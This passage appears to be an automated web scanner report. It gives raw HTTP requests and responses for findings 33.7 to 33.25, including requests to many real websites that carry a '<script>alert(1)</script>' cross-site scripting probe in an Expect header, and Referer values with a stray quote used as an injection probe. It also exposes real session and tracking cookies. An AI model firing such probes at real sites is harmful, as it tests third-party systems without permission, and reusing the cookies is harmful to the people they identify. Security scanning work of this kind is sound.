P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 02 May 2011 02:08:15 GMT
Connection: close
Content-Length: 1831

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

33.7. http://content.pulse360.com/CC4A2528-2176-11DF-BB34-61FFECADD848

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /CC4A2528-2176-11DF-BB34-61FFECADD848

Request

GET /CC4A2528-2176-11DF-BB34-61FFECADD848 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 01:57:35 GMT
Server: Barista/1.1-(eanjbj)
Connection: Close
Content-Length: 8991
Content-Type: text/html
P3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"

document.write('<style type="text/css"> div#p360-hybrid160x600aquabulgeads-CC4A2528-2176-11DF-BB34-61FFECADD848 { width: 160px; left: 0; font-family: sans-serif; position: relative; disp
...[SNIP]...

33.8. http://danilolee.com/cgi-sys/suspendedpage.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://danilolee.com
Path:   /cgi-sys/suspendedpage.cgi

Request

GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: danilolee.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:40:04 GMT
Server: Apache
Content-Length: 810
Content-Type: text/html

<HTML>
<head>
<style>
a { font-family: arial, verdana; font-size: 14px; color: #000000; text-decoration: none; }
a:hover { text-decoration: underline; }


body { background-color: #FFF; font-family: a
...[SNIP]...

33.9. http://loadus.exelator.com/load/net.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Mon, 02 May 2011 01:55:58 GMT
Server: HTTP server
Content-Length: 385

<HTML><BODY><img src="http://cm.g.doubleclick.net/pixel?nid=exelate&j=0" width="1" height="1"></img><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=1031" width="0" height="0" border="
...[SNIP]...

33.10. http://online.wsj.com/internal/ModTwitWSJMarkets.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /internal/ModTwitWSJMarkets.htm

Request

GET /internal/ModTwitWSJMarkets.htm?dojo.preventCache=1304320341570 HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424052748704473104576293321328159878.html?mod=WSJ_newsreel_markets
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: djcs_route=df918f0b-504c-492b-8824-dc0b9235aa6b; s_dbfe=1303590600843; wsjregion=na%2cus; s_vnum=1306182600841%26vn%3D2; __utmz=1.1304311304.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2267%22%5D%2C%22low%22%3A%5B%2247%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DMon%2C%2002%20May%202011%2005%3A00%3A36%20GMT%7C%7CweatherCode%3D10005; DJSESSION=ORCS%3Dna%2Cus%7C%7CBIZO%3Dbiz%3D1053%3B%7C%7CFREEREGSCRIMCOUNT%3Dnull; _chartbeat2=9b7spduc6sokdd53; rsi_csl=; rsi_segs=; __utma=1.1864565573.1304311304.1304311304.1304311304.1; __utmc=1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:43:00 GMT
Server: Apache
Last-Modified: Tue, 08 Feb 2011 15:23:10 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Wed, 01 Jun 2011 02:43:00 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Type: text/html
Content-Length: 3277


<div class="headlineSummary twHeadline">
<h3>Latest Tweets</h3>
</div>
<div class="twLatestTweets headlineSummary twLatestTweets-av">
<ul class="twTweetsItem">


<li>


<a href="http://twitt
...[SNIP]...

33.11. http://pixel.invitemedia.com/data_sync

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /data_sync

Request

GET /data_sync?partner_id=9&exchange_id=4 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]}"; camp_freq_p1="eJzjkuF49ZlFgFFi4+0vb1kUGDV2vgTSBowWYD6XCMeK+axA2cl9p4GyDBoMBgwWDEDRnfeZgaKz5q9FiAIA+4cX7Q=="; io_freq_p1="eJzjkuY4HijAKLHx9pe3LAqMGm9BtAGjBZjPJcyxLRQoObnvNFCSQYPBgMGCASi41wUoOGv+WoQgAJWpFmw="; dp_rec="{\"3\": 1303562003+ \"2\": 1304243633}"; segments_p1=eJzjYuZYEMzFzHE0B0hMNwYSjRFcLBwHuxmBzHMgwdM5QH5nBzOQOVEFyNyxi5GLi2PnPmaBWQfnvGMBCv8LBxIbi4Fy6z8wAsknF0Bk038mkBwHkHnoCIi53w/IvLiXCUg2/weRa/czAgCyXiCB; partnerUID="eyI3OSI6IFsiMTc1NGJiNjUwNjIzYzViZTQzZmNhMGI1N2MzOTEwZDkiLCB0cnVlXSwgIjE5OSI6IFsiQkRGQkZGQzIzMUEyODJENkUyNDQ1QjhFNERFNEEyRTAiLCB0cnVlXSwgIjQ4IjogWyI2MjEwOTQ3MDQ3Nzg2MzAwMjY4MjgzMzg0MjY0ODU0NzEyMjg3MCIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 02-May-2011 02:23:11 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"3\": 1304303011+ \"2\": 1304243633}"; Domain=invitemedia.com; expires=Tue, 01-May-2012 02:23:31 GMT; Path=/
Content-Length: 512
Set-Cookie: dps2b=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; Max-Age=14400

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4316443142505&PixelID=186","javascr
...[SNIP]...

33.12. http://tags.bluekai.com/site/3945

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3945

Request

GET /site/3945?ret=html&phint=__bk_t%3DWelcome%20%7C%20Japanator.com%3A%20anime%20news%2C%20original%20features%2C%20and%20weird%20stories%20from%20Japan%2C%20updated%20daily!&phint=__bk_k%3Danime%2C%20manga%2C%20japanimation%2C%20Japanese%20animation%2C%20news%2C%20information%2C%20reviews%2C%20forum%2C%20columns%2C%20answerman%2C%20shelf%20life%2C%20press%20releases%2C%20DVD%2C%20release%20dates%2C%20encyc%2C%20encyclopedia%2C%20cast%2C%20staff%2C%20seiyuu%2C%20otaku%2C%20Japan%20Blog%2C%20Japanator%2C%20ANN&limit=4&r=22181052 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101jqAtKWn9WuzOUD=; bkst=KJy5MgNvhW9DCVIh/sCuVx3nCVNQ4rd1kcsBbyGChmiViC1ZY/aLWjv/ntYdI9ot0MSYakRVFGcwRsaMjIFL+r5X4mK1Tc6qR9rboZTVxl1EFvDMIweH9jEz1R7YHDoqsT7v0zQuioahNZZ7iDeYk2dw7FdNdY8yHH9BT6JJvgkWnLlkHFKy9f9wJL2F0dB15i5L536mS2awYNRRfvoLtCjcAfdhitz4wqLcApQoA7uKAbxqpoJENUjUSmmInRXU2DRjOr+aooMQsQANMYA+Aas2dc702EQWYse/7OlimlcHpl+8Fdn8PfCIGCYkkD/u0iovYnsZvik3vbyov0pB8IL3dx5GsWZQ; bk=e1mPh2iZ/VKVIHOf; bkc=KJpM8sPQZsfY0nO88x84HQRsOATQd8Tvv+IhAysacXmYTn1OIKFZ1MvLHrnUGws7ZYeT7ay1e9KZ1beyD8oHIRTB3cyxMVpKqHPDX6crxISel94M9yODsYNN; bko=KJ0E8VBQtnh0CbXYQ0ux5Vqaek2ICiGQbIuucqb1e1qLe9pfyvyfF9y1vR+OnsXTuhU/0rROLHvOg9yySh/qC1U1999p5HUd; bkw5=KJpE+Z/9QCvsW6YuWzxWAo0X666Rs4uHjJCxjsfq/VuRDVEzfDcLW3QRCsEMgj7n0999mnyv5x==

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 01:58:50 GMT
Set-Cookie: bklc=4dbe0fda; expires=Wed, 04-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=chBAO2thl+ZVIHOf; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJpn8s5QIwsRAKWVdp84HQRsCAyQUI6HvkXjMS2P0TeYjboW8UBPGwJ4Jvc0ozPHIEWLYeT7nywe5OBsCL6g5Xe82NHxIRb5eYCXAcTR7yl/UpKUAVWNWgXsMEdaO1c78sJQmeY59RV46Gpv5th98RBGjwBr3bYSel/41CdAwCQ491l+ugD=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bko=KJynWtHQr1Vdp8KHxjSwQVcp0CtIYQ0uxBSjaE+XIHZ3Qv0EulR9jRljsHMtQPklKOARDCSeVBbXWnN1evo9PMRwuYyHvLq11/AByZJk999zIhAI; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJh5MfNvhW9DCVIh/sCVY6+CLq9BpmI5ZEvrzPPRkCM5D7cYOYsyVTxATQFRnfbYMuQtQCjiRVa+RI1nVBMRtEgjuZ0dXlcmFHNTVQHRQsouEvqB8eHTccqQhS1B0nCMWGDnkqRtanZEGuDDxImL66TEQREwwZI2ddSlTZwktSBFMNSOvTJGsO5vDLAkzZZm8QrUuyegRJnAneLR0V3cfjbGpDnDQ8ukO3+XBYMEg48wf2bfP285QlTDoday7JYTSFqMwPPVhtiMrL0toXVXLCr6i6yhyEDuSCCEViYMKFjNTIBKa0Y9jrHLW8tnyloz0TLfp2IffuDvDPGoJvWLoTxxSdv1GgqYZipcpnyI+mfNXgXd4yc+WaPx; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkw5=KJpfoXU9y1OP049nunW0JnQh1e90zc/5Z1f9L1tDQzsBL8nC9M+/p1TuHsq0uTLp1sCq9HDpkeYzR9YJ1ROJE+foJGy1IAQ0EYQ0+I6x1LyG1rft/cRJP9hYLFcVpsPASc5QRWiE3sH/9Rr2zWYT9aUZJjv1QHwWw0OfrO7R7OcItxF6syBFJz1njoeqag+O2eOP1M999Jbv/oA=; expires=Sat, 29-Oct-2011 01:58:50 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 03-May-2011 01:58:50 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 997
Content-Type: text/html
Connection: keep-alive

<html>
<head>
</head>
<body>
<div id="bk_exchange">
<img src="http://ad.yieldmanager.com/pixel?id=1182722&id=1182795&id=1182798&id=1182799&id=1182843&t=2" width=1 height=1 border=0 alt="">
<img src="h
...[SNIP]...

33.13. http://tomopop.com/index-ad-anime.phtml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tomopop.com
Path:   /index-ad-anime.phtml

Request

GET /index-ad-anime.phtml HTTP/1.1
Host: tomopop.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:56:30 GMT
Server: lighttpd/1.4.28
Content-Length: 2874

<html>
<body bgcolor=white leftmargin=0 topmargin=0>


<table cellpadding=0 cellspacing=0 border=0 style="margin-top:10px;">

<tr>

<td colspan=4><B><font size=2 face=arial color=#666666 style=margin-
...[SNIP]...

33.14. http://view.atdmt.com/jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]

Request

GET /jaction/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security] HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.business.att.com/enterprise/Family/network-security/threat-vulnerability-management/?GUID=F7BA3C75-6B83-4966-96A6-0F35574C4352&WT.srch=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1:d2ca/12b1e; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484:cbb7115/12b1e/130edf9b/d2ca/4dbdeda3

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:49 GMT
Connection: close
Content-Length: 503

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://ec.atdmt.com/images/pixel.gif','http://na.decdna.net/n/61239/71938/EI6/x/e?value=0&trans=&domain=na
...[SNIP]...

33.15. http://www.100grandinstantwin.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.100grandinstantwin.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.100grandinstantwin.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:51:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 187

<html>
<head>
<title>Error</title>
</head>
<body>
<div>
<h3>Please try again later. Thank you.</h3>
</div>
</body>
</html>

33.16. http://www.2hairy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.2hairy.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2hairy.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:42:29 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.53</center>
</body>
</html>

33.17. http://www.92kqrs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.92kqrs.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.92kqrs.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 68
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDCSADQTQA=DOHBJHPCELCDEEPCDMDKOFHJ; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021f0d45525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.92kqrs.com:80/favicon.ico

33.18. http://www.ahima.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ahima.org
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ahima.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:09:36 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.19. http://www.allsup.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allsup.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allsup.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:38:54 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.20. http://www.amateurathome.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amateurathome.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.amateurathome.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.54
Date: Mon, 02 May 2011 00:54:14 GMT
Content-Type: text/html
Content-Length: 169
Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.8.54</center>
</body>
</html>

33.21. http://www.argosy.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.argosy.edu
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.argosy.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:00:38 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

33.22. http://www.babynameshub.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.babynameshub.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.babynameshub.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:24:52 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.23. http://www.benchmade.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.benchmade.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.benchmade.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:11:43 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

33.24. http://www.bitstatement.net/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bitstatement.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bitstatement.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
X-Powered-By: BIT
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 22:58:30 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

33.25. http://www.blackintrusion.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blackintrusion.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
